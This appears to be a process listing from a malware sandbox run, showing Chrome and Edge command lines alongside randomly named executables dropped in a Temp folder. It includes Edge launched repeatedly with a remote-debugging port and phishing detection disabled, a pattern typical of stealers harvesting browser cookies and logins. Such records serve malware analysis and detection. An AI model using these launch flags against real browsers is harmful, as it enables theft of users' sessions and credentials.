"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=unzip.mojom.Unzipper --lang=en-US --service-sandbox-type=service --no-appcompat-clear --field-trial-handle=4932,i,7148252125621235404,3555082334418967925,262144 --variations-seed-version=20250216-180425.389000 --mojo-platform-channel-handle=4896 /prefetch:8

C:\Program Files\Google\Chrome\Application\chrome.exe

"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=data_decoder.mojom.DataDecoderService --lang=en-US --service-sandbox-type=service --no-appcompat-clear --field-trial-handle=4692,i,7148252125621235404,3555082334418967925,262144 --variations-seed-version=20250216-180425.389000 --mojo-platform-channel-handle=4852 /prefetch:8

C:\Program Files\Google\Chrome\Application\chrome.exe

"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=unzip.mojom.Unzipper --lang=en-US --service-sandbox-type=service --no-appcompat-clear --field-trial-handle=5212,i,7148252125621235404,3555082334418967925,262144 --variations-seed-version=20250216-180425.389000 --mojo-platform-channel-handle=4748 /prefetch:8

C:\Program Files\Google\Chrome\Application\chrome.exe

"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=data_decoder.mojom.DataDecoderService --lang=en-US --service-sandbox-type=service --no-appcompat-clear --field-trial-handle=4840,i,7148252125621235404,3555082334418967925,262144 --variations-seed-version=20250216-180425.389000 --mojo-platform-channel-handle=4740 /prefetch:8

C:\Program Files\Google\Chrome\Application\chrome.exe

"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --extension-process --no-appcompat-clear --remote-debugging-port=9223 --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=16 --field-trial-handle=5204,i,7148252125621235404,3555082334418967925,262144 --variations-seed-version=20250216-180425.389000 --mojo-platform-channel-handle=5324 /prefetch:2

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --remote-debugging-port=9223 --profile-directory="Default"

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=crashpad-handler "--user-data-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" /prefetch:7 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Crashpad" "--metrics-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" --annotation=IsOfficialBuild=1 --annotation=channel= --annotation=chromium-version=92.0.4515.131 "--annotation=exe=C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --annotation=plat=Win64 "--annotation=prod=Microsoft Edge" --annotation=ver=92.0.902.67 --initial-client-data=0x164,0x168,0x16c,0x140,0x170,0x7ff8528946f8,0x7ff852894708,0x7ff852894718

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=gpu-process --field-trial-handle=2076,11498894531753433131,16912522410453394280,131072 --gpu-preferences=UAAAAAAAAADgAAAQAAAAAAAAAAAAAAAAAABgAAAAAAAwAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAHgAAAAAAAAAeAAAAAAAAAAoAAAABAAAACAAAAAAAAAAKAAAAAAAAAAwAAAAAAAAADgAAAAAAAAAEAAAAAAAAAAAAAAADQAAABAAAAAAAAAAAQAAAA0AAAAQAAAAAAAAAAQAAAANAAAAEAAAAAAAAAAHAAAADQAAAAgAAAAAAAAACAAAAAAAAAA= --mojo-platform-channel-handle=2092 /prefetch:2

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --field-trial-handle=2076,11498894531753433131,16912522410453394280,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=2188 /prefetch:3

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=gpu-process --field-trial-handle=2076,11498894531753433131,16912522410453394280,131072 --gpu-preferences=UAAAAAAAAADgAAAQAAAAAAAAAAAAAAAAAABgAAAAAAAwAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAHgAAAAAAAAAeAAAAAAAAAAoAAAABAAAACAAAAAAAAAAKAAAAAAAAAAwAAAAAAAAADgAAAAAAAAAEAAAAAAAAAAAAAAADQAAABAAAAAAAAAAAQAAAA0AAAAQAAAAAAAAAAQAAAANAAAAEAAAAAAAAAAHAAAADQAAAAgAAAAAAAAACAAAAAAAAAA= --mojo-platform-channel-handle=2456 /prefetch:2

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=gpu-process --field-trial-handle=2076,11498894531753433131,16912522410453394280,131072 --gpu-preferences=UAAAAAAAAADgAAAQAAAAAAAAAAAAAAAAAABgAAAAAAAwAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAHgAAAAAAAAAeAAAAAAAAAAoAAAABAAAACAAAAAAAAAAKAAAAAAAAAAwAAAAAAAAADgAAAAAAAAAEAAAAAAAAAAAAAAADQAAABAAAAAAAAAAAQAAAA0AAAAQAAAAAAAAAAQAAAANAAAAEAAAAAAAAAAHAAAADQAAAAgAAAAAAAAACAAAAAAAAAA= --mojo-platform-channel-handle=2600 /prefetch:2

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=storage.mojom.StorageService --field-trial-handle=2076,11498894531753433131,16912522410453394280,131072 --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=2716 /prefetch:8

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=gpu-process --field-trial-handle=2076,11498894531753433131,16912522410453394280,131072 --gpu-preferences=UAAAAAAAAADgAAAQAAAAAAAAAAAAAAAAAABgAAAAAAAwAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAHgAAAAAAAAAeAAAAAAAAAAoAAAABAAAACAAAAAAAAAAKAAAAAAAAAAwAAAAAAAAADgAAAAAAAAAEAAAAAAAAAAAAAAADQAAABAAAAAAAAAAAQAAAA0AAAAQAAAAAAAAAAQAAAANAAAAEAAAAAAAAAAHAAAADQAAAAgAAAAAAAAACAAAAAAAAAA= --use-gl=swiftshader-webgl --mojo-platform-channel-handle=2260 /prefetch:2

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --remote-debugging-port=9223 --field-trial-handle=2076,11498894531753433131,16912522410453394280,131072 --disable-gpu-compositing --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=9 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=3380 /prefetch:1

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --remote-debugging-port=9223 --field-trial-handle=2076,11498894531753433131,16912522410453394280,131072 --disable-gpu-compositing --lang=en-US --disable-client-side-phishing-detection --instant-process --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=8 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=3392 /prefetch:1

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=gpu-process --field-trial-handle=2076,11498894531753433131,16912522410453394280,131072 --gpu-preferences=UAAAAAAAAADgAAAQAAAAAAAAAAAAAAAAAABgAAAAAAAwAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAHgAAAAAAAAAeAAAAAAAAAAoAAAABAAAACAAAAAAAAAAKAAAAAAAAAAwAAAAAAAAADgAAAAAAAAAEAAAAAAAAAAAAAAADQAAABAAAAAAAAAAAQAAAA0AAAAQAAAAAAAAAAQAAAANAAAAEAAAAAAAAAAHAAAADQAAAAgAAAAAAAAACAAAAAAAAAA= --use-gl=swiftshader-webgl --mojo-platform-channel-handle=2264 /prefetch:2

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=gpu-process --field-trial-handle=2076,11498894531753433131,16912522410453394280,131072 --gpu-preferences=UAAAAAAAAADgAAAQAAAAAAAAAAAAAAAAAABgAAAAAAAwAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAHgAAAAAAAAAeAAAAAAAAAAoAAAABAAAACAAAAAAAAAAKAAAAAAAAAAwAAAAAAAAADgAAAAAAAAAEAAAAAAAAAAAAAAADQAAABAAAAAAAAAAAQAAAA0AAAAQAAAAAAAAAAQAAAANAAAAEAAAAAAAAAAHAAAADQAAAAgAAAAAAAAACAAAAAAAAAA= --use-gl=swiftshader-webgl --mojo-platform-channel-handle=2424 /prefetch:2

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=gpu-process --field-trial-handle=2076,11498894531753433131,16912522410453394280,131072 --gpu-preferences=UAAAAAAAAADgAAAQAAAAAAAAAAAAAAAAAABgAAAAAAAwAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAHgAAAAAAAAAeAAAAAAAAAAoAAAABAAAACAAAAAAAAAAKAAAAAAAAAAwAAAAAAAAADgAAAAAAAAAEAAAAAAAAAAAAAAADQAAABAAAAAAAAAAAQAAAA0AAAAQAAAAAAAAAAQAAAANAAAAEAAAAAAAAAAHAAAADQAAAAgAAAAAAAAACAAAAAAAAAA= --use-gl=disabled --mojo-platform-channel-handle=3308 /prefetch:2

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=gpu-process --field-trial-handle=2076,11498894531753433131,16912522410453394280,131072 --gpu-preferences=UAAAAAAAAADgAAAQAAAAAAAAAAAAAAAAAABgAAAAAAAwAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAHgAAAAAAAAAeAAAAAAAAAAoAAAABAAAACAAAAAAAAAAKAAAAAAAAAAwAAAAAAAAADgAAAAAAAAAEAAAAAAAAAAAAAAADQAAABAAAAAAAAAAAQAAAA0AAAAQAAAAAAAAAAQAAAANAAAAEAAAAAAAAAAHAAAADQAAAAgAAAAAAAAACAAAAAAAAAA= --use-gl=disabled --mojo-platform-channel-handle=3764 /prefetch:2

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=gpu-process --field-trial-handle=2076,11498894531753433131,16912522410453394280,131072 --gpu-preferences=UAAAAAAAAADgAAAQAAAAAAAAAAAAAAAAAABgAAAAAAAwAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAHgAAAAAAAAAeAAAAAAAAAAoAAAABAAAACAAAAAAAAAAKAAAAAAAAAAwAAAAAAAAADgAAAAAAAAAEAAAAAAAAAAAAAAADQAAABAAAAAAAAAAAQAAAA0AAAAQAAAAAAAAAAQAAAANAAAAEAAAAAAAAAAHAAAADQAAAAgAAAAAAAAACAAAAAAAAAA= --use-gl=disabled --mojo-platform-channel-handle=2812 /prefetch:2

C:\Users\Admin\AppData\Local\Temp\WatcherUpdate_test.exe

C:\Users\Admin\AppData\Local\Temp\WatcherUpdate_test.exe

C:\Users\Admin\AppData\Local\Temp\10077730101\JCFx2xj.exe

"C:\Users\Admin\AppData\Local\Temp\10077730101\JCFx2xj.exe"

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --remote-debugging-port=9223 --profile-directory="Default"

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=crashpad-handler "--user-data-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" /prefetch:7 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Crashpad" "--metrics-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" --annotation=IsOfficialBuild=1 --annotation=channel= --annotation=chromium-version=92.0.4515.131 "--annotation=exe=C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --annotation=plat=Win64 "--annotation=prod=Microsoft Edge" --annotation=ver=92.0.902.67 --initial-client-data=0x164,0x168,0x16c,0x140,0x170,0x7ff8528946f8,0x7ff852894708,0x7ff852894718

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=gpu-process --field-trial-handle=2208,7206079144991899670,9860853250256860966,131072 --gpu-preferences=UAAAAAAAAADgAAAQAAAAAAAAAAAAAAAAAABgAAAAAAAwAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAHgAAAAAAAAAeAAAAAAAAAAoAAAABAAAACAAAAAAAAAAKAAAAAAAAAAwAAAAAAAAADgAAAAAAAAAEAAAAAAAAAAAAAAADQAAABAAAAAAAAAAAQAAAA0AAAAQAAAAAAAAAAQAAAANAAAAEAAAAAAAAAAHAAAADQAAAAgAAAAAAAAACAAAAAAAAAA= --mojo-platform-channel-handle=2216 /prefetch:2

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --field-trial-handle=2208,7206079144991899670,9860853250256860966,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=2272 /prefetch:3

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=storage.mojom.StorageService --field-trial-handle=2208,7206079144991899670,9860853250256860966,131072 --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=2908 /prefetch:8

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=gpu-process --field-trial-handle=2208,7206079144991899670,9860853250256860966,131072 --gpu-preferences=UAAAAAAAAADgAAAQAAAAAAAAAAAAAAAAAABgAAAAAAAwAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAHgAAAAAAAAAeAAAAAAAAAAoAAAABAAAACAAAAAAAAAAKAAAAAAAAAAwAAAAAAAAADgAAAAAAAAAEAAAAAAAAAAAAAAADQAAABAAAAAAAAAAAQAAAA0AAAAQAAAAAAAAAAQAAAANAAAAEAAAAAAAAAAHAAAADQAAAAgAAAAAAAAACAAAAAAAAAA= --mojo-platform-channel-handle=2364 /prefetch:2

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --remote-debugging-port=9223 --field-trial-handle=2208,7206079144991899670,9860853250256860966,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=7 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=3528 /prefetch:1

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --remote-debugging-port=9223 --field-trial-handle=2208,7206079144991899670,9860853250256860966,131072 --lang=en-US --disable-client-side-phishing-detection --instant-process --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=6 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=3564 /prefetch:1

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=gpu-process --field-trial-handle=2208,7206079144991899670,9860853250256860966,131072 --gpu-preferences=UAAAAAAAAADgAAAQAAAAAAAAAAAAAAAAAABgAAAAAAAwAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAHgAAAAAAAAAeAAAAAAAAAAoAAAABAAAACAAAAAAAAAAKAAAAAAAAAAwAAAAAAAAADgAAAAAAAAAEAAAAAAAAAAAAAAADQAAABAAAAAAAAAAAQAAAA0AAAAQAAAAAAAAAAQAAAANAAAAEAAAAAAAAAAHAAAADQAAAAgAAAAAAAAACAAAAAAAAAA= --mojo-platform-channel-handle=2872 /prefetch:2

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=gpu-process --field-trial-handle=2208,7206079144991899670,9860853250256860966,131072 --gpu-preferences=UAAAAAAAAADgAAAQAAAAAAAAAAAAAAAAAABgAAAAAAAwAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAHgAAAAAAAAAeAAAAAAAAAAoAAAABAAAACAAAAAAAAAAKAAAAAAAAAAwAAAAAAAAADgAAAAAAAAAEAAAAAAAAAAAAAAADQAAABAAAAAAAAAAAQAAAA0AAAAQAAAAAAAAAAQAAAANAAAAEAAAAAAAAAAHAAAADQAAAAgAAAAAAAAACAAAAAAAAAA= --use-gl=swiftshader-webgl --mojo-platform-channel-handle=2248 /prefetch:2

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=gpu-process --field-trial-handle=2208,7206079144991899670,9860853250256860966,131072 --gpu-preferences=UAAAAAAAAADgAAAQAAAAAAAAAAAAAAAAAABgAAAAAAAwAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAHgAAAAAAAAAeAAAAAAAAAAoAAAABAAAACAAAAAAAAAAKAAAAAAAAAAwAAAAAAAAADgAAAAAAAAAEAAAAAAAAAAAAAAADQAAABAAAAAAAAAAAQAAAA0AAAAQAAAAAAAAAAQAAAANAAAAEAAAAAAAAAAHAAAADQAAAAgAAAAAAAAACAAAAAAAAAA= --use-gl=swiftshader-webgl --mojo-platform-channel-handle=3884 /prefetch:2

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=gpu-process --field-trial-handle=2208,7206079144991899670,9860853250256860966,131072 --gpu-preferences=UAAAAAAAAADgAAAQAAAAAAAAAAAAAAAAAABgAAAAAAAwAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAHgAAAAAAAAAeAAAAAAAAAAoAAAABAAAACAAAAAAAAAAKAAAAAAAAAAwAAAAAAAAADgAAAAAAAAAEAAAAAAAAAAAAAAADQAAABAAAAAAAAAAAQAAAA0AAAAQAAAAAAAAAAQAAAANAAAAEAAAAAAAAAAHAAAADQAAAAgAAAAAAAAACAAAAAAAAAA= --use-gl=swiftshader-webgl --mojo-platform-channel-handle=3868 /prefetch:2

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=gpu-process --field-trial-handle=2208,7206079144991899670,9860853250256860966,131072 --gpu-preferences=UAAAAAAAAADgAAAQAAAAAAAAAAAAAAAAAABgAAAAAAAwAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAHgAAAAAAAAAeAAAAAAAAAAoAAAABAAAACAAAAAAAAAAKAAAAAAAAAAwAAAAAAAAADgAAAAAAAAAEAAAAAAAAAAAAAAADQAAABAAAAAAAAAAAQAAAA0AAAAQAAAAAAAAAAQAAAANAAAAEAAAAAAAAAAHAAAADQAAAAgAAAAAAAAACAAAAAAAAAA= --use-gl=disabled --mojo-platform-channel-handle=3312 /prefetch:2

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=gpu-process --field-trial-handle=2208,7206079144991899670,9860853250256860966,131072 --gpu-preferences=UAAAAAAAAADgAAAQAAAAAAAAAAAAAAAAAABgAAAAAAAwAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAHgAAAAAAAAAeAAAAAAAAAAoAAAABAAAACAAAAAAAAAAKAAAAAAAAAAwAAAAAAAAADgAAAAAAAAAEAAAAAAAAAAAAAAADQAAABAAAAAAAAAAAQAAAA0AAAAQAAAAAAAAAAQAAAANAAAAEAAAAAAAAAAHAAAADQAAAAgAAAAAAAAACAAAAAAAAAA= --use-gl=disabled --mojo-platform-channel-handle=4132 /prefetch:2

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=gpu-process --field-trial-handle=2208,7206079144991899670,9860853250256860966,131072 --gpu-preferences=UAAAAAAAAADgAAAQAAAAAAAAAAAAAAAAAABgAAAAAAAwAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAHgAAAAAAAAAeAAAAAAAAAAoAAAABAAAACAAAAAAAAAAKAAAAAAAAAAwAAAAAAAAADgAAAAAAAAAEAAAAAAAAAAAAAAADQAAABAAAAAAAAAAAQAAAA0AAAAQAAAAAAAAAAQAAAANAAAAEAAAAAAAAAAHAAAADQAAAAgAAAAAAAAACAAAAAAAAAA= --use-gl=disabled --mojo-platform-channel-handle=4512 /prefetch:2

C:\Users\Admin\AppData\Local\Temp\10078350101\BXxKvLN.exe

"C:\Users\Admin\AppData\Local\Temp\10078350101\BXxKvLN.exe"

C:\Users\Admin\AppData\Local\Temp\10079230101\v6Oqdnc.exe

"C:\Users\Admin\AppData\Local\Temp\10079230101\v6Oqdnc.exe"

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --remote-debugging-port=9223 --profile-directory="Default"

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=crashpad-handler "--user-data-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" /prefetch:7 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Crashpad" "--metrics-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" --annotation=IsOfficialBuild=1 --annotation=channel= --annotation=chromium-version=92.0.4515.131 "--annotation=exe=C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --annotation=plat=Win64 "--annotation=prod=Microsoft Edge" --annotation=ver=92.0.902.67 --initial-client-data=0x164,0x168,0x16c,0x140,0x170,0x7ff8528946f8,0x7ff852894708,0x7ff852894718

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=gpu-process --field-trial-handle=2172,1312226905027184980,14790259171978717531,131072 --gpu-preferences=UAAAAAAAAADgAAAQAAAAAAAAAAAAAAAAAABgAAAAAAAwAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAHgAAAAAAAAAeAAAAAAAAAAoAAAABAAAACAAAAAAAAAAKAAAAAAAAAAwAAAAAAAAADgAAAAAAAAAEAAAAAAAAAAAAAAADQAAABAAAAAAAAAAAQAAAA0AAAAQAAAAAAAAAAQAAAANAAAAEAAAAAAAAAAHAAAADQAAAAgAAAAAAAAACAAAAAAAAAA= --mojo-platform-channel-handle=2184 /prefetch:2

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --field-trial-handle=2172,1312226905027184980,14790259171978717531,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=2232 /prefetch:3

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=storage.mojom.StorageService --field-trial-handle=2172,1312226905027184980,14790259171978717531,131072 --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=2852 /prefetch:8

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=gpu-process --field-trial-handle=2172,1312226905027184980,14790259171978717531,131072 --gpu-preferences=UAAAAAAAAADgAAAQAAAAAAAAAAAAAAAAAABgAAAAAAAwAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAHgAAAAAAAAAeAAAAAAAAAAoAAAABAAAACAAAAAAAAAAKAAAAAAAAAAwAAAAAAAAADgAAAAAAAAAEAAAAAAAAAAAAAAADQAAABAAAAAAAAAAAQAAAA0AAAAQAAAAAAAAAAQAAAANAAAAEAAAAAAAAAAHAAAADQAAAAgAAAAAAAAACAAAAAAAAAA= --mojo-platform-channel-handle=2572 /prefetch:2

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --remote-debugging-port=9223 --field-trial-handle=2172,1312226905027184980,14790259171978717531,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=7 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=3472 /prefetch:1

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --remote-debugging-port=9223 --field-trial-handle=2172,1312226905027184980,14790259171978717531,131072 --lang=en-US --disable-client-side-phishing-detection --instant-process --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=6 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=3508 /prefetch:1

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=gpu-process --field-trial-handle=2172,1312226905027184980,14790259171978717531,131072 --gpu-preferences=UAAAAAAAAADgAAAQAAAAAAAAAAAAAAAAAABgAAAAAAAwAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAHgAAAAAAAAAeAAAAAAAAAAoAAAABAAAACAAAAAAAAAAKAAAAAAAAAAwAAAAAAAAADgAAAAAAAAAEAAAAAAAAAAAAAAADQAAABAAAAAAAAAAAQAAAA0AAAAQAAAAAAAAAAQAAAANAAAAEAAAAAAAAAAHAAAADQAAAAgAAAAAAAAACAAAAAAAAAA= --mojo-platform-channel-handle=2568 /prefetch:2

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=gpu-process --field-trial-handle=2172,1312226905027184980,14790259171978717531,131072 --gpu-preferences=UAAAAAAAAADgAAAQAAAAAAAAAAAAAAAAAABgAAAAAAAwAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAHgAAAAAAAAAeAAAAAAAAAAoAAAABAAAACAAAAAAAAAAKAAAAAAAAAAwAAAAAAAAADgAAAAAAAAAEAAAAAAAAAAAAAAADQAAABAAAAAAAAAAAQAAAA0AAAAQAAAAAAAAAAQAAAANAAAAEAAAAAAAAAAHAAAADQAAAAgAAAAAAAAACAAAAAAAAAA= --use-gl=swiftshader-webgl --mojo-platform-channel-handle=3356 /prefetch:2

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=gpu-process --field-trial-handle=2172,1312226905027184980,14790259171978717531,131072 --gpu-preferences=UAAAAAAAAADgAAAQAAAAAAAAAAAAAAAAAABgAAAAAAAwAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAHgAAAAAAAAAeAAAAAAAAAAoAAAABAAAACAAAAAAAAAAKAAAAAAAAAAwAAAAAAAAADgAAAAAAAAAEAAAAAAAAAAAAAAADQAAABAAAAAAAAAAAQAAAA0AAAAQAAAAAAAAAAQAAAANAAAAEAAAAAAAAAAHAAAADQAAAAgAAAAAAAAACAAAAAAAAAA= --use-gl=swiftshader-webgl --mojo-platform-channel-handle=2568 /prefetch:2

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=gpu-process --field-trial-handle=2172,1312226905027184980,14790259171978717531,131072 --gpu-preferences=UAAAAAAAAADgAAAQAAAAAAAAAAAAAAAAAABgAAAAAAAwAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAHgAAAAAAAAAeAAAAAAAAAAoAAAABAAAACAAAAAAAAAAKAAAAAAAAAAwAAAAAAAAADgAAAAAAAAAEAAAAAAAAAAAAAAADQAAABAAAAAAAAAAAQAAAA0AAAAQAAAAAAAAAAQAAAANAAAAEAAAAAAAAAAHAAAADQAAAAgAAAAAAAAACAAAAAAAAAA= --use-gl=swiftshader-webgl --mojo-platform-channel-handle=3940 /prefetch:2

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

